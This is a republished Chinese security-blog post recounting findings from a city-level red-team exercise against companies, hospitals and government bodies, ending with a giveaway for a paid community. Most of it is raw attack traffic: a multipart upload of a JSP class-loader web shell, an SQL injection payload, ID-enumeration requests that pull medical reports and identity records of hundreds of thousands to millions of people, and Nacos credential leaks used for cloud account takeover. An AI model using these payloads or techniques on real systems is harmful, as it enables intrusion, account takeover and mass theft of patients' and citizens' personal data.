正文部分
上上个月参加了某个地级市的攻防演练,将小部分报告合并分享出来(想要抽奖的师傅直接拉到文末就行啦~~)(打码打到我想死~)
某公司未授权+文件上传getshell
http://xxx.xxx.xxx:9081
文件上传getshell
POST /api/portal/v1/file/upload?lang=zh_CN HTTP/1.1
Host: xxx.xxx.xxx:9081
Content-Length: 1230
Accept: application/json, text/plain, */*
Tenant-Code: WS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3
Origin:
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_search_keyword%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_referrer%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMThmY2NiMGQyOTFhY2MtMGQ4Y2QxNGI4MDJjZjMtNGM2NTdiNTgtMTM5NTM5Ni0xOGZjY2IwZDI5MjE4NTQifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%7D
Connection: close
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="file"; filename="11.jsp"
Content-Type: image/png
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="type"
NEWS
------WebKitFormBoundaryytBWAvbx7URctPS3--
https://xxx.xxx.xxx/static_resources/draft/news/xxxx/xxxxx.jsp
密码:passwd
某医院百万用户泄露
体检报告查看
POST /app-api/examination/getInspectionList HTTP/1.1
Host: xxx.xxx.xxx:18145
Content-Length: 70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Authorization: Bearer b78b2e2f-b162-4528-ba26-38ff5da78f87
Apptoken: 5891187f4fe91f58bb0fdcf8216254a6d71d43bbe198e86f92a70648f2bc55c9e8cc344fa9b4fa0126c2b78d9891aa71d276a1b8ec0c48b0f20c452f5d129da2f31a907799852ae1cca039a8277d19d4339f19e02116487d737686472fe212bc810e9e61fcde11436e0494459e46bd59cc84fe78097e94f631a694bbb0340a4a0f14f2fefbf4e4b1f8065b28647cec0ff0178d1b4ea44f444bda289f84d1b53cb5a8dc0ed7531dd5c327e4dea7ecaa853eed0acc41652d2205228d6c12a108bb
Content-Type: application/json
Accept: */*
Origin:
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
{"queryType":8,"queryValue":"6363","month":"2024-05","needPage":false}
遍历queryValue即可从0到3000000都不间断有报告 这是2225636
这是808
用户订单信息查看
POST /app-manage/inHospital/getInpatientPayList HTTP/1.1
Host: xxx.xxx.xxx:18145
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
VERSION: test
Content-Length: 46
{"pageSize": 100,"needPage": true,"pageNo": 1}
只需要把pagesize修改为10000即可
某医院百万五要素泄露
通过小程序获取到站点
遍历uid可以获取到五要素身份证,姓名,电话,地址,出生日期
POST /xxxx/xxxx/xxxlativeList HTTP/1.1
Host: xxx.xxx.xxx
Content-Length:24
Xweb_xhr:1
Orgcode:18477
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/116.0.0.0Safari/537.36MicroMessenger/7.0.20.1781(0x6700143B)NetType/WIFI MiniProgramEnv/WindowsWindowsWechat/WMPF WindowsWechat(0x6309071d) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Accept:*/*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
hCode=18477&uid=39701982
遍历uid即可获取百万敏感信息,大约500个跑出来250条数据,目前应该总共有400w的uid,大约有200w的五要素
部分uid会泄露全家,父母,自己,配偶的五要素等敏感信息
通过这里获取的信息,还可以获取到用户的:住院信息,拍片信息,付款信息,发票信息,挂号信息,手术信息
某局数据库权限+getshell
nacos 泄露postgre数据库连接密码
获取数据库权限
尝试连接之后直接进行命令执行
rabbitmq
某局所有用户接管+SQL注入获取oracle26个数据库40个数据库用户以及DBA权限
也是通过小程序获取站点
获取所有公司管理者用户名和明文密码,以及管理者的手机号身份证等信息 随便点击一个企业
自动发送数据包
泄露信息如下
泄露该公司管理员的账号密码,尝试登陆可以登录成功 登录网址:https:/xxx.xxx.xxx/
最终泄露的信息如下 1161个公司的账号和密码 登陆公司账号之后可以获得相关人的身份证、手机号、邮箱
获得账号密码之后可以进行登陆
点击进入系统
可以获取大量视频监控权限查看到实时监控,以及各大地方监控的token
所有账号弱口令,通过后台获取到电话号,密码为a123456
SQL注入
数据包
POST /cxmStatic/dashboard/1/list HTTP/1.1
Host: xxx.xxx.xxx
Cookie:
Content-Length: 14
Accept-Encoding: gzip, deflate, br
Apptype: WEIXIN_MINI
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxNDUwNjc6V0VJWElOX01JTkkiLCJleHAiOjE3MTU5NjQwNTEsImlhdCI6MTcxNTk0OTY1MX0.qUHwdpcRccIg4Nct5i58qPxZ6OiV9PfBhHilWhyIG_0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Charset: UTF-8
Xweb_xhr: 1
X-Requested-With: XMLHttpRequest
Appid: wx67d2416db3cb5b69
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
Connection: close
zoneId=511827*
数据库如下总计26个
数据库的用户名如下总计40个数据库用户
其中一个数据库256个表
数据库中有三要素信息
某医院水平越权查看20w+患者体检报告
数据包如下,token随便用一个自己生成的token即可 生成token 发送如下数据包即可获取token
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineeIcno":"123"}
POST /sj-bifrost-web/report/detail HTTP/2
Host: xxx.xxx.xxx
Content-Length: 101
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
{"token":"F83BA1402B2A8AABB3D042115500D571D3A1685910B84F00B907689BA4ED0547","serviceNumber":"199245"}
遍历serviceNumber即可查看其他的报告,但是身份证还是跟token相关,报告仅仅与serviceNumber相关,遍历serviceNumber从0到30w
这里id从0遍历到了20w都有数据
某学院附属医院未授权SQL注入获取58387条公民信息
通过数据包获取token
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 31
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineePhone":"' or '1'='1"}
利用token获取三要素信息
GET /sj-bifrost-web/report/reportOrderList?token=8ED9D6B38CDBF617724060160F957101311CFF26B28F48D18CFFDCA22C3D7A62 HTTP/2
Host: xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
某工会云接管getshell
nacos中泄露了ak导致云接管
aliyun:
textAudit:
accessKeyId: xxxxxxxxx
secret: xxxxxxxxxxxxx
endpoint: xxxxxxxxxxxxxx
获取阿里云账号密码
成功登陆 获取一台阿里云服务器权限
可以直接在阿里云进行终端控制rce,getshell
同时该账户旗下有大量的资源如下图:多个域名控制权服务器控制权多个储存控制权网关控制权短信服务控制权视频直播控制权DNS服务器控制权51个资源
某工会nacos存在身份验证绕过漏洞+ 数据库权限
http://xxx.xxx.xxx:28848/nacos/
### redis服务
redisInfo:
host:xxxxxxxxxx
port:xxxxxxxx
password: xxxxxxxxxxx
database:0
### mysql服务
custom:
mysql:
master:
connect:xxxxxxxx
username: xxxxxx
password:xxxxxxxx
slave:
connect:xxxxxxxxx/xxxxxx
username: xxxxxxxxxx
password:xxxxxxx
dxb:
httpUrl: xxxxxxxxxx
dxbUsername: xxxx
dxbPassword: xxxxx
rabbitmq:
host: xxxxxxx
port: xxxxxx
username: xxxxxxx
password: xxxxxxxxxxxx
泄露微信apikey和密钥
获取ak:https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=xxxxx&secret=xxxxxxxxxxxxxxx
https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ak可以利用该ak管理公众号
文末抽奖
为了回馈对我们团队的众多师傅的长期支持,我们决定再放送名额!
注:本次抽奖和之前星球介绍中的抽奖可以叠加!!如果欧皇附体,连中两次,可以进行免费加入两年
具体的星球介绍可以看一下这里~~
开奖前转发本文至朋友圈,不可设置分组与可见日期,参与抽奖获取免费进入资格(声明:开奖后转发至朋友圈、设置分组、设置可见日期都不予以兑奖)
原文始发于微信公众号(实战安全研究):地市护网爽拿上万分,一次看个爽(文末抽奖)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论